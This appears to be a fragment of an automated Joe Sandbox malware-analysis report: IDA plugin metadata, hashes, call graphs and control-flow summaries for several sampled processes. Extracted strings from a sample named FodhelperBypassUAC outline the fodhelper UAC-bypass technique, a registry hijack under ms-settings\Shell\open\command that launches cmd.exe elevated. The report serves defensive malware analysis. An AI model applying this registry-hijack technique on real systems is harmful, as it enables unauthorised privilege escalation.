                                                                                                                                                          • Instruction Fuzzy Hash: 68F0E571C08E9C6FD7A4AA19880DBBE7BE4EB44751F80413EE40AE3250DD6069018790
                                                                                                                                                          Memory Dump Source
                                                                                                                                                          • Source File: 00000001.00000002.1348940243.00007FF7C1430000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF7C1430000, based on PE: false
                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                          • Snapshot File: hcaresult_1_2_7ff7c1430000_e7WMhx18XN.jbxd
                                                                                                                                                          Similarity
                                                                                                                                                          • API ID:
                                                                                                                                                          • String ID:
                                                                                                                                                          • API String ID:
                                                                                                                                                          • Opcode ID: 21b3cdf9651fc17b21c1acf8ab8476a0116813e82bbbdefbff09832df80243ac
                                                                                                                                                          • Instruction ID: 872f3bc6fbe8938918b85d1383edc79b0452fce42c63af3e7e681aa0c480148a
                                                                                                                                                          • Opcode Fuzzy Hash: 21b3cdf9651fc17b21c1acf8ab8476a0116813e82bbbdefbff09832df80243ac
                                                                                                                                                          • Instruction Fuzzy Hash: 45E0D821B5CC1D1F9A94F73C5859A6566D5EBDC36175107F3E80CC7296DC64EC418381
                                                                                                                                                          Memory Dump Source
                                                                                                                                                          • Source File: 00000001.00000002.1348940243.00007FF7C1430000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF7C1430000, based on PE: false
                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                          • Snapshot File: hcaresult_1_2_7ff7c1430000_e7WMhx18XN.jbxd
                                                                                                                                                          Similarity
                                                                                                                                                          • API ID:
                                                                                                                                                          • String ID:
                                                                                                                                                          • API String ID:
                                                                                                                                                          • Opcode ID: 0502fa011711e8df4af3a5b09d6058db6b959c4503fddc4e15cb2009db750956
                                                                                                                                                          • Instruction ID: 1eeaacd5483fa2d7c4979bbbce286f8b755ce5030a64d8c2461da8056eb50f53
                                                                                                                                                          • Opcode Fuzzy Hash: 0502fa011711e8df4af3a5b09d6058db6b959c4503fddc4e15cb2009db750956
                                                                                                                                                          • Instruction Fuzzy Hash: 61E0DF20B18C0D1FAA94F62C8445A69A2C1EB8C3B0B9006B2E40DC3296DC68EC418380
                                                                                                                                                          Memory Dump Source
                                                                                                                                                          • Source File: 00000001.00000002.1348940243.00007FF7C1430000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF7C1430000, based on PE: false
                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                          • Snapshot File: hcaresult_1_2_7ff7c1430000_e7WMhx18XN.jbxd
                                                                                                                                                          Similarity
                                                                                                                                                          • API ID:
                                                                                                                                                          • String ID:
                                                                                                                                                          • API String ID:
                                                                                                                                                          • Opcode ID: cf1c2c741f9f50d055c4e1c90e8563a39c8452ca616c73f6757834c2f4124ed0
                                                                                                                                                          • Instruction ID: a69f8af62426e018c470169ea0aae2bb8c6703c783d777a96fa50c5dbd4a3320
                                                                                                                                                          • Opcode Fuzzy Hash: cf1c2c741f9f50d055c4e1c90e8563a39c8452ca616c73f6757834c2f4124ed0
                                                                                                                                                          • Instruction Fuzzy Hash: C5D05E22B2C96909FB196A18B4916FDB790EB51379F54517AE80B802C7DC5B61828184
                                                                                                                                                          Memory Dump Source
                                                                                                                                                          • Source File: 00000001.00000002.1348940243.00007FF7C1430000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF7C1430000, based on PE: false
                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                          • Snapshot File: hcaresult_1_2_7ff7c1430000_e7WMhx18XN.jbxd
                                                                                                                                                          Similarity
                                                                                                                                                          • API ID:
                                                                                                                                                          • String ID:
                                                                                                                                                          • API String ID:
                                                                                                                                                          • Opcode ID: c6d8baa3011eec643e3404d83ec7217bb52701645a3c5b12787e699bcd466997
                                                                                                                                                          • Instruction ID: f254d2beeec246ba4f7e19f69816d628eeed78235e29a4f8d8683fdaa3c5bd6e
                                                                                                                                                          • Opcode Fuzzy Hash: c6d8baa3011eec643e3404d83ec7217bb52701645a3c5b12787e699bcd466997
                                                                                                                                                          • Instruction Fuzzy Hash: 0AB1AE3190D7890FD31ABE2898849B1BBD0EF96360B9501BED48EC7193E955B947C3A1

                                                                                                                                                          Execution Graph

                                                                                                                                                          Execution Coverage: 29.5%
                                                                                                                                                          Dynamic/Decrypted Code Coverage: 0%
                                                                                                                                                          Signature Coverage: 0%
                                                                                                                                                          Total number of Nodes: 15
                                                                                                                                                          Total number of Limit Nodes: 0
                                                                                                                                                          Execution graph nodes (node id: address, annotation):
                                                                                                                                                          • 277: 4022fa
                                                                                                                                                          • 278: 40232c
                                                                                                                                                          • 280: 4023e5
                                                                                                                                                          • 281: 40224f
                                                                                                                                                          • 282: 402285
                                                                                                                                                          • 284: 4022be
                                                                                                                                                          • 285: 4010c4
                                                                                                                                                          • 286: 402480
                                                                                                                                                          • 287: 4010e7 (memset)
                                                                                                                                                          • 288: 40115b
                                                                                                                                                          • 289: 401214 (sprintf)
                                                                                                                                                          • 290: 4012bd
                                                                                                                                                          • 291: 4023f2 (_controlfp)
                                                                                                                                                          • 292: 4010c4 (2 API calls)
                                                                                                                                                          • 293: 402473
                                                                                                                                                          Execution graph edges:
                                                                                                                                                          • 291 -> 292 -> 293
                                                                                                                                                          • 277 -> 278 -> 281 -> 282 -> 285 -> 286 -> 287 -> 288 -> 289 -> 290 -> 284 -> 280

                                                                                                                                                          Callgraph

                                                                                                                                                          • Executed
                                                                                                                                                          • Not Executed
                                                                                                                                                          • Opacity -> Relevance
                                                                                                                                                          • Disassembly available
                                                                                                                                                          Call graph edges (caller -> callees):
                                                                                                                                                          • Function_004010C4 -> Function_004019D8, Function_00401D58, Function_00401000, Function_00401C98, Function_00401D98, Function_00401D18
                                                                                                                                                          • Function_0040224F -> Function_004010C4, Function_00402158, Function_004021EC
                                                                                                                                                          • Function_004022FA -> Function_0040224F
                                                                                                                                                          • Function_004023F2 -> Function_004010C4
                                                                                                                                                          • Function_004018EF -> Function_004014B4
                                                                                                                                                          • Function_004014B4 -> Function_00401443, Function_00401970
                                                                                                                                                          • Callers of Function_004018EF: Function_00401BD8, Function_00401F58, Function_00401DD8, Function_00401C58, Function_00401B58, Function_00401AD8, Function_00401A58, Function_004019D8, Function_00401D58, Function_00401CD8, Function_00402058, Function_004020D8, Function_00401FD8, Function_00401E58, Function_00401ED8, Function_00401F18, Function_00402018, Function_00401C18, Function_00401A98, Function_00401B98, Function_00401B18, Function_00401A18, Function_00401998, Function_00401C98, Function_00401D98, Function_00401D18, Function_00402118, Function_00402098, Function_00401F98, Function_00401E18, Function_00401E98
                                                                                                                                                          Functions in the call graph with no recorded edges:
                                                                                                                                                          • Function_004017C6, Function_004024C7, Function_004022CB, Function_0062346D, Function_00623E76, Function_00623678, Function_006230C0, Function_004021E5, Function_00402477, Function_00623CDA, Function_00623D22, Function_00401784, Function_00402487, Function_006234AC, Function_006236B7, Function_00402497, Function_006232B8, Function_00623686, Function_00623004, Function_00623384, Function_004024A7, Function_00623D8A, Function_00623989, Function_00623290, Function_004024B7, Function_00623D9A, Function_004010BD

                                                                                                                                                          Control-flow Graph

                                                                                                                                                          APIs
                                                                                                                                                          Strings
                                                                                                                                                          Memory Dump Source
                                                                                                                                                          • Source File: 0000000A.00000002.1355288578.0000000000401000.00000020.00000001.01000000.00000007.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                          • Associated: 0000000A.00000002.1355248654.0000000000400000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                          • Associated: 0000000A.00000002.1355370929.0000000000403000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                          • Associated: 0000000A.00000002.1355650857.0000000000623000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                          • Snapshot File: hcaresult_10_2_400000_paint.jbxd
                                                                                                                                                          Similarity
                                                                                                                                                          • API ID: memsetsprintf
                                                                                                                                                          • String ID: M,1]X
                                                                                                                                                          • API String ID: 4041149307-3282636315
                                                                                                                                                          • Opcode ID: f025086886e33f02448ab4351ee0044f6475c1f81167808764aa881225fd618a
                                                                                                                                                          • Instruction ID: 39431a9c6eb76416a74e9ecc622619c51ee20e8814d728a91cb63a132b490c0f
                                                                                                                                                          • Opcode Fuzzy Hash: f025086886e33f02448ab4351ee0044f6475c1f81167808764aa881225fd618a
                                                                                                                                                          • Instruction Fuzzy Hash: 4E712B61702B148DEB909B27DC5139A37A8B749FC8F804176EE4CA7B98EE3DCA448744

Control-flow Graph (rendered graph not reproduced; executed/not-executed colouring lost). Basic blocks:
• 401000-401045: call 402478, then falls through to 401048-401050
• 401048-401050: branches to 4010b6-4010bb (no successors) or to 401056-4010b4
• 401056-4010b4: loops back to 401048-401050
Strings
• h_mx+]><w=kk_)!,s5&)b_bg:a)=bh,4, xrefs: 00401098
Memory Dump Source
• Source File: 0000000A.00000002.1355288578.0000000000401000.00000020.00000001.01000000.00000007.sdmp, Offset: 00400000, based on PE: true
• Associated: 0000000A.00000002.1355248654.0000000000400000.00000002.00000001.01000000.00000007.sdmp
• Associated: 0000000A.00000002.1355370929.0000000000403000.00000002.00000001.01000000.00000007.sdmp
• Associated: 0000000A.00000002.1355650857.0000000000623000.00000004.00000001.01000000.00000007.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_10_2_400000_paint.jbxd
Similarity
• API ID:
• String ID: h_mx+]><w=kk_)!,s5&)b_bg:a)=bh,4
• API String ID: 0-462813950
• Opcode ID: 7c3953f8a7c90db685ffea7de54f2d06ba9ad392580460fe7ac0a4260f709850
• Instruction ID: 0d50406a0cd25772023a57935085f3dfc6f67c384a3cfb9a17e074b16623a215
• Opcode Fuzzy Hash: 7c3953f8a7c90db685ffea7de54f2d06ba9ad392580460fe7ac0a4260f709850
• Instruction Fuzzy Hash: BC214772B01A40DEEB04CBA9D8913AC3BF1E74878DF00846AEE5DA7B58DA38D5518744

Control-flow Graph (rendered graph not reproduced; no basic-block data extracted)
Memory Dump Source
• Source File: 0000000A.00000002.1355288578.0000000000401000.00000020.00000001.01000000.00000007.sdmp, Offset: 00400000, based on PE: true
• Associated: 0000000A.00000002.1355248654.0000000000400000.00000002.00000001.01000000.00000007.sdmp
• Associated: 0000000A.00000002.1355370929.0000000000403000.00000002.00000001.01000000.00000007.sdmp
• Associated: 0000000A.00000002.1355650857.0000000000623000.00000004.00000001.01000000.00000007.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_10_2_400000_paint.jbxd
Similarity
• API ID:
• String ID:
• API String ID:
• Opcode ID: d7060d96631f312a0dc568d4d07ef498c7ad85a2d75c32ebe8d41481305ccb03
• Instruction ID: 9686121eb9f72fae5e10ab2d8a3ac4b9ff7170e1f7ab924ecbeb4b8f0178945f
• Opcode Fuzzy Hash: d7060d96631f312a0dc568d4d07ef498c7ad85a2d75c32ebe8d41481305ccb03
• Instruction Fuzzy Hash: 9F215B64702A149CEA44DB67DD653A933A5B74DFC8F808436AE0CA73A5EE7DC6508344

Control-flow Graph (rendered graph not reproduced; executed/not-executed colouring lost). Single basic block:
• 40224f-4022ca: call 402158, call 4010c4, call 4021ec
Memory Dump Source
• Source File: 0000000A.00000002.1355288578.0000000000401000.00000020.00000001.01000000.00000007.sdmp, Offset: 00400000, based on PE: true
• Associated: 0000000A.00000002.1355248654.0000000000400000.00000002.00000001.01000000.00000007.sdmp
• Associated: 0000000A.00000002.1355370929.0000000000403000.00000002.00000001.01000000.00000007.sdmp
• Associated: 0000000A.00000002.1355650857.0000000000623000.00000004.00000001.01000000.00000007.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_10_2_400000_paint.jbxd
Similarity
• API ID: memsetsprintf
• String ID:
• API String ID: 4041149307-0
• Opcode ID: 65e9c95be4e24cea900e83d314afdb39b553b8fe9f9e6c70aa87f87638c826b2
• Instruction ID: 0ef21ab13f0e72f5e82b28ca8a1d802b698ef2cd9161ee3339a6462a6fe8d703
• Opcode Fuzzy Hash: 65e9c95be4e24cea900e83d314afdb39b553b8fe9f9e6c70aa87f87638c826b2
• Instruction Fuzzy Hash: 1501E476702B488DDB40DF67DC9139833A4B349BC8F008826AE0CA7B68DA38C6618744
Memory Dump Source
• Source File: 0000000A.00000002.1355288578.0000000000401000.00000020.00000001.01000000.00000007.sdmp, Offset: 00400000, based on PE: true
• Associated: 0000000A.00000002.1355248654.0000000000400000.00000002.00000001.01000000.00000007.sdmp
• Associated: 0000000A.00000002.1355370929.0000000000403000.00000002.00000001.01000000.00000007.sdmp
• Associated: 0000000A.00000002.1355650857.0000000000623000.00000004.00000001.01000000.00000007.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_10_2_400000_paint.jbxd
Similarity
• API ID:
• String ID:
• API String ID:
• Opcode ID: a33d4c2589a0a0e030cf565e08a5ce4a3f4aa7e1e7ab656288357c1d05c0b8cb
• Instruction ID: f5786d1abfcdca8d5aa6566e32f28f63e9c87e4faa2297304d8ad0afc813e31e
• Opcode Fuzzy Hash: a33d4c2589a0a0e030cf565e08a5ce4a3f4aa7e1e7ab656288357c1d05c0b8cb
• Instruction Fuzzy Hash: A9E0B6B6608B84918210EF96F08040AB7A4F7D87C4B14495AFAC807B19CF38C1608B54

Memory Dump Source
• Source File: 0000000A.00000002.1355288578.0000000000401000.00000020.00000001.01000000.00000007.sdmp, Offset: 00400000, based on PE: true
• Associated: 0000000A.00000002.1355248654.0000000000400000.00000002.00000001.01000000.00000007.sdmp
• Associated: 0000000A.00000002.1355370929.0000000000403000.00000002.00000001.01000000.00000007.sdmp
• Associated: 0000000A.00000002.1355650857.0000000000623000.00000004.00000001.01000000.00000007.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_10_2_400000_paint.jbxd
Similarity
• API ID:
• String ID:
• API String ID:
• Opcode ID: 020f5d48da09c7700aeda8bd0a3f6b9993537dbb26fb64f6943ef127969a50b2
• Instruction ID: c7d7455ca217e8b3c23fe1936170d254a3e5e22e9f4eb8c11b6f947ad1bce58b
• Opcode Fuzzy Hash: 020f5d48da09c7700aeda8bd0a3f6b9993537dbb26fb64f6943ef127969a50b2
• Instruction Fuzzy Hash: 72E0B6B6608B84918610EF55F09000AB7A4F7D87C4B10452AFACC07B19CF38C1608B54

Memory Dump Source
• Source File: 0000000A.00000002.1355288578.0000000000401000.00000020.00000001.01000000.00000007.sdmp, Offset: 00400000, based on PE: true
• Associated: 0000000A.00000002.1355248654.0000000000400000.00000002.00000001.01000000.00000007.sdmp
• Associated: 0000000A.00000002.1355370929.0000000000403000.00000002.00000001.01000000.00000007.sdmp
• Associated: 0000000A.00000002.1355650857.0000000000623000.00000004.00000001.01000000.00000007.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_10_2_400000_paint.jbxd
Similarity
• API ID:
• String ID:
• API String ID:
• Opcode ID: ca3c3e23f7f5060f60ee19056fbc1c70fca65fad76dbb6e40effcae9b66313bb
• Instruction ID: 627af5f8094be66caef8c1b0706e96e42ef7260cfbbcc69a360fc60fbdea0424
• Opcode Fuzzy Hash: ca3c3e23f7f5060f60ee19056fbc1c70fca65fad76dbb6e40effcae9b66313bb
• Instruction Fuzzy Hash: DCE0B676608BC4818610EF56F08000EB7A4F3D87C4B50451AFEC807B19CF38C1608B94

Memory Dump Source
• Source File: 0000000A.00000002.1355288578.0000000000401000.00000020.00000001.01000000.00000007.sdmp, Offset: 00400000, based on PE: true
• Associated: 0000000A.00000002.1355248654.0000000000400000.00000002.00000001.01000000.00000007.sdmp
• Associated: 0000000A.00000002.1355370929.0000000000403000.00000002.00000001.01000000.00000007.sdmp
• Associated: 0000000A.00000002.1355650857.0000000000623000.00000004.00000001.01000000.00000007.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_10_2_400000_paint.jbxd
Similarity
• API ID:
• String ID:
• API String ID:
• Opcode ID: db6b6cfaf8a4343f9749643661a9f9a5664ab33be6a1bd7be59ea7afcb63d4d2
• Instruction ID: b2e0e82ad3426746da12d9f0277540f7e25234b30cdab3b6ff9ce6c5225f79a2
• Opcode Fuzzy Hash: db6b6cfaf8a4343f9749643661a9f9a5664ab33be6a1bd7be59ea7afcb63d4d2
• Instruction Fuzzy Hash: B5E0B676608B88818610EF55F09000EB7B4F3E87C4B10852AFAC817B19CF38C2608B54

Memory Dump Source
• Source File: 0000000A.00000002.1355288578.0000000000401000.00000020.00000001.01000000.00000007.sdmp, Offset: 00400000, based on PE: true
• Associated: 0000000A.00000002.1355248654.0000000000400000.00000002.00000001.01000000.00000007.sdmp
• Associated: 0000000A.00000002.1355370929.0000000000403000.00000002.00000001.01000000.00000007.sdmp
• Associated: 0000000A.00000002.1355650857.0000000000623000.00000004.00000001.01000000.00000007.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_10_2_400000_paint.jbxd
Similarity
• API ID:
• String ID:
• API String ID:
• Opcode ID: 1a28beb2cf51f9b71989e72db21d67a0b42a4e1b113aff34d5980b4674a401d7
• Instruction ID: a4dee403f1f2686bbcf15adc62412925ab874ec13bcc78934c739608fafdbb81
• Opcode Fuzzy Hash: 1a28beb2cf51f9b71989e72db21d67a0b42a4e1b113aff34d5980b4674a401d7
• Instruction Fuzzy Hash: A6E0B676608B84D28210EF56F09000AB7A4F3D87C4B10455AFAC817B19CF38C1608B54

Execution Graph

Execution Coverage: 24.6%
Dynamic/Decrypted Code Coverage: 0%
Signature Coverage: 17.7%
Total number of Nodes: 62
Total number of Limit Nodes: 2

Callgraph

• Executed
• Not Executed
• Opacity -> Relevance
• Disassembly available

Control-flow Graph

APIs
Strings
Memory Dump Source
• Source File: 0000000C.00000002.1375057059.00007FF6CF671000.00000020.00000001.01000000.00000008.sdmp, Offset: 00007FF6CF670000, based on PE: true
• Associated: 0000000C.00000002.1375029725.00007FF6CF670000.00000002.00000001.01000000.00000008.sdmp
• Associated: 0000000C.00000002.1375088798.00007FF6CF672000.00000002.00000001.01000000.00000008.sdmp
• Associated: 0000000C.00000002.1375124956.00007FF6CF675000.00000002.00000001.01000000.00000008.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_12_2_7ff6cf670000_FodhelperBypassUAC.jbxd
Similarity
• API ID: CreateValue$DeleteProcessSleepTree
• String ID: $/c C:\Windows\System32\fodhelper.exe$C:\Windows\System32\cmd.exe$DelegateExecute$Software\Classes\ms-settings$Software\Classes\ms-settings\Shell\open\command$cmd.exe$h
• API String ID: 1234705242-1006108852

Control-flow Graph

APIs
Memory Dump Source
• Source File: 0000000C.00000002.1375057059.00007FF6CF671000.00000020.00000001.01000000.00000008.sdmp, Offset: 00007FF6CF670000, based on PE: true
• Associated: 0000000C.00000002.1375029725.00007FF6CF670000.00000002.00000001.01000000.00000008.sdmp
• Associated: 0000000C.00000002.1375088798.00007FF6CF672000.00000002.00000001.01000000.00000008.sdmp
• Associated: 0000000C.00000002.1375124956.00007FF6CF675000.00000002.00000001.01000000.00000008.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_12_2_7ff6cf670000_FodhelperBypassUAC.jbxd
Similarity
• API ID: __p___argc__p___argv__scrt_acquire_startup_lock__scrt_release_startup_lock_cexit_exit_get_initial_narrow_environment_register_thread_local_exe_atexit_callback
• String ID:
• API String ID: 1133592946-0

Control-flow Graph

APIs
Memory Dump Source
• Source File: 0000000C.00000002.1375057059.00007FF6CF671000.00000020.00000001.01000000.00000008.sdmp, Offset: 00007FF6CF670000, based on PE: true
• Associated: 0000000C.00000002.1375029725.00007FF6CF670000.00000002.00000001.01000000.00000008.sdmp
• Associated: 0000000C.00000002.1375088798.00007FF6CF672000.00000002.00000001.01000000.00000008.sdmp
• Associated: 0000000C.00000002.1375124956.00007FF6CF675000.00000002.00000001.01000000.00000008.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_12_2_7ff6cf670000_FodhelperBypassUAC.jbxd
Similarity
• API ID: ExceptionFilterPresentUnhandledmemset$CaptureContextDebuggerEntryFeatureFunctionLookupProcessorUnwindVirtual
• String ID:
• API String ID: 313767242-0

Control-flow Graph

APIs
Memory Dump Source
• Source File: 0000000C.00000002.1375057059.00007FF6CF671000.00000020.00000001.01000000.00000008.sdmp, Offset: 00007FF6CF670000, based on PE: true
• Associated: 0000000C.00000002.1375029725.00007FF6CF670000.00000002.00000001.01000000.00000008.sdmp
• Associated: 0000000C.00000002.1375088798.00007FF6CF672000.00000002.00000001.01000000.00000008.sdmp
• Associated: 0000000C.00000002.1375124956.00007FF6CF675000.00000002.00000001.01000000.00000008.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_12_2_7ff6cf670000_FodhelperBypassUAC.jbxd
Similarity
• API ID: CurrentTime$CounterFilePerformanceProcessQuerySystemThread
• String ID:
• API String ID: 2933794660-0
Memory Dump Source
• Source File: 0000000C.00000002.1375057059.00007FF6CF671000.00000020.00000001.01000000.00000008.sdmp, Offset: 00007FF6CF670000, based on PE: true
• Associated: 0000000C.00000002.1375029725.00007FF6CF670000.00000002.00000001.01000000.00000008.sdmp
• Associated: 0000000C.00000002.1375088798.00007FF6CF672000.00000002.00000001.01000000.00000008.sdmp
• Associated: 0000000C.00000002.1375124956.00007FF6CF675000.00000002.00000001.01000000.00000008.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_12_2_7ff6cf670000_FodhelperBypassUAC.jbxd
Similarity
• API ID:
• String ID:
• API String ID:
APIs
Memory Dump Source
• Source File: 00000012.00000003.2319216744.0000025EE91B0000.00000040.00000001.00020000.00000000.sdmp, Offset: 0000025EE91B0000, based on PE: true
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_18_3_25ee91b0000_cmd.jbxd
Similarity
• API ID: LibraryLoad
• String ID:
• API String ID: 1029625771-0
Memory Dump Source
• Source File: 00000012.00000003.2319216744.0000025EE91B0000.00000040.00000001.00020000.00000000.sdmp, Offset: 0000025EE91B0000, based on PE: true
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_18_3_25ee91b0000_cmd.jbxd
Similarity
• API ID:
• String ID:
• API String ID:
APIs
Strings
Memory Dump Source
• Source File: 00000012.00000003.2319216744.0000025EE91B0000.00000040.00000001.00020000.00000000.sdmp, Offset: 0000025EE91B0000, based on PE: true
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_18_3_25ee91b0000_cmd.jbxd
Similarity
• API ID: BlockFrameHandler3::Unwind$CatchExecutionHandlerIs_bad_exception_allowedSearchStatestd::bad_alloc::bad_alloc
• String ID: csm$csm$csm
• API String ID: 849930591-393685449
                                                                                                                                                          • Opcode ID: 99dcd42e55987f84e0a9dbea2fa1ae191c477915d496a4e3a9a042af50ac5220
                                                                                                                                                          • Instruction ID: f28fc687896d4139d30c8c897761bb3e552ef1ba97f32469433e587c37b06b9e
                                                                                                                                                          • Opcode Fuzzy Hash: 99dcd42e55987f84e0a9dbea2fa1ae191c477915d496a4e3a9a042af50ac5220
                                                                                                                                                          • Instruction Fuzzy Hash: 04D18F32A20B40C6EF68DF65DC8A39D37E1F765BA9F120105EA8997B95FB34C681C704
                                                                                                                                                          APIs
                                                                                                                                                          Memory Dump Source
                                                                                                                                                          • Source File: 00000012.00000003.2319216744.0000025EE91B0000.00000040.00000001.00020000.00000000.sdmp, Offset: 0000025EE91B0000, based on PE: true
                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                          • Snapshot File: hcaresult_18_3_25ee91b0000_cmd.jbxd
                                                                                                                                                          Similarity
                                                                                                                                                          • API ID: Initialize__scrt_acquire_startup_lock__scrt_dllmain_after_initialize_c__scrt_dllmain_crt_thread_attach__scrt_release_startup_lock
                                                                                                                                                          • String ID:
                                                                                                                                                          • API String ID: 190073905-0
                                                                                                                                                          • Opcode ID: 53754b190eade9ddf9a12de580ea1969ce11fb76c0c5d26610c7ca44f503f6dd
                                                                                                                                                          • Instruction ID: c921c9aba2334a6d0092e7f07059beb14aec36786fd0548b4771fea109da4331
                                                                                                                                                          • Opcode Fuzzy Hash: 53754b190eade9ddf9a12de580ea1969ce11fb76c0c5d26610c7ca44f503f6dd
                                                                                                                                                          • Instruction Fuzzy Hash: 3381C321F34F40C6FE5CAB659C4B35922D3ABB67A2F4740159909C7BD6FA38CB458708
                                                                                                                                                          APIs
                                                                                                                                                          Strings
                                                                                                                                                          Memory Dump Source
                                                                                                                                                          • Source File: 00000012.00000003.2319216744.0000025EE91B0000.00000040.00000001.00020000.00000000.sdmp, Offset: 0000025EE91B0000, based on PE: true
                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                          • Snapshot File: hcaresult_18_3_25ee91b0000_cmd.jbxd
                                                                                                                                                          Similarity
                                                                                                                                                          • API ID: Frame$EmptyHandler3::StateUnwind__except_validate_context_record
                                                                                                                                                          • String ID: csm$csm
                                                                                                                                                          • API String ID: 3896166516-3733052814
                                                                                                                                                          • Opcode ID: eaa3ef4f1944c03eb6c37dfa640564b8b9e6afec5d94ced6829f034688bc3bbb
                                                                                                                                                          • Instruction ID: 5e4fdaf1e17cf85aef7fb460c53afaec577b73d5d5f87f643fadb939f87bb33d
                                                                                                                                                          • Opcode Fuzzy Hash: eaa3ef4f1944c03eb6c37dfa640564b8b9e6afec5d94ced6829f034688bc3bbb
                                                                                                                                                          • Instruction Fuzzy Hash: E0519F32920B40C6EF688F119D4D3587BE2E364BAAF174115DB89C7B81F738CA51C709
                                                                                                                                                          APIs
                                                                                                                                                          Strings
                                                                                                                                                          Memory Dump Source
                                                                                                                                                          • Source File: 00000012.00000003.2319216744.0000025EE91B0000.00000040.00000001.00020000.00000000.sdmp, Offset: 0000025EE91B0000, based on PE: true
                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                          • Snapshot File: hcaresult_18_3_25ee91b0000_cmd.jbxd
                                                                                                                                                          Similarity
                                                                                                                                                          • API ID: CurrentImageNonwritable__except_validate_context_record
                                                                                                                                                          • String ID: csm
                                                                                                                                                          • API String ID: 3242871069-1018135373
                                                                                                                                                          • Opcode ID: b80ff68eb806cf2b6af9fc4dc9cc0d46113cdbfcc8a0c2797bbdc03f84945619
                                                                                                                                                          • Instruction ID: edd22457178831f364d98d4a18c339cde365896e110aaafec55a10c8becf8b25
                                                                                                                                                          • Opcode Fuzzy Hash: b80ff68eb806cf2b6af9fc4dc9cc0d46113cdbfcc8a0c2797bbdc03f84945619
                                                                                                                                                          • Instruction Fuzzy Hash: 14517031A22F00CADF58DB15DC497AC33D2E764FA9F1745A5AA4687788F778CA41C704
                                                                                                                                                          APIs
                                                                                                                                                          Strings
                                                                                                                                                          Memory Dump Source
                                                                                                                                                          • Source File: 00000012.00000003.2319216744.0000025EE91B0000.00000040.00000001.00020000.00000000.sdmp, Offset: 0000025EE91B0000, based on PE: true
                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                          • Snapshot File: hcaresult_18_3_25ee91b0000_cmd.jbxd
                                                                                                                                                          Similarity
                                                                                                                                                          • API ID: CallTranslator
                                                                                                                                                          • String ID: MOC$RCC
                                                                                                                                                          • API String ID: 3163161869-2084237596
                                                                                                                                                          • Opcode ID: 17958f67cb0a17abd9ffe4ca5dea2288dd301e2c3aed8a7adc88a0e8f0f7cfb5
                                                                                                                                                          • Instruction ID: a90f7e981518f9cb031f847199aa60fbb296b346fe3f1cc0c6e4cd2bb0b4be4b
                                                                                                                                                          • Opcode Fuzzy Hash: 17958f67cb0a17abd9ffe4ca5dea2288dd301e2c3aed8a7adc88a0e8f0f7cfb5
                                                                                                                                                          • Instruction Fuzzy Hash: A361D232914FC4C2DB348F15E8457DAB7E1F7A4BA9F064205EB9883B95EB38C681CB04
                                                                                                                                                          APIs
                                                                                                                                                          Memory Dump Source
                                                                                                                                                          • Source File: 00000013.00000003.2319726003.000001AD31C90000.00000040.00000001.00020000.00000000.sdmp, Offset: 000001AD31C90000, based on PE: true
                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                          • Snapshot File: hcaresult_19_3_1ad31c90000_conhost.jbxd
                                                                                                                                                          Similarity
                                                                                                                                                          • API ID: LibraryLoad
                                                                                                                                                          • String ID:
                                                                                                                                                          • API String ID: 1029625771-0
                                                                                                                                                          • Opcode ID: da5dba7eb06952aa6345e7caa7b696f440210d15dc911575dfa97e0e60fe5b6d
                                                                                                                                                          • Instruction ID: 2384b4396a3186cbdf71c8729acd06fe5936fda3123d3287874cf64b57c5126a
                                                                                                                                                          • Opcode Fuzzy Hash: da5dba7eb06952aa6345e7caa7b696f440210d15dc911575dfa97e0e60fe5b6d
                                                                                                                                                          • Instruction Fuzzy Hash: 1E9105F2B02A9287DF548F75E4007A9B3B1FB45B94F549124AE4B47B9CDB38D892C702
                                                                                                                                                          APIs
                                                                                                                                                          Strings
                                                                                                                                                          Memory Dump Source
                                                                                                                                                          • Source File: 00000013.00000003.2319726003.000001AD31C90000.00000040.00000001.00020000.00000000.sdmp, Offset: 000001AD31C90000, based on PE: true
                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                          • Snapshot File: hcaresult_19_3_1ad31c90000_conhost.jbxd
                                                                                                                                                          Similarity
                                                                                                                                                          • API ID: BlockFrameHandler3::Unwind$CatchExecutionHandlerIs_bad_exception_allowedSearchStatestd::bad_alloc::bad_alloc
                                                                                                                                                          • String ID: csm$csm$csm
                                                                                                                                                          • API String ID: 849930591-393685449
                                                                                                                                                          • Opcode ID: 99dcd42e55987f84e0a9dbea2fa1ae191c477915d496a4e3a9a042af50ac5220
                                                                                                                                                          • Instruction ID: 49321541c4b0a1206d85933380bf082b3ab422ed2b09568f7957ac5bfeda5d9b
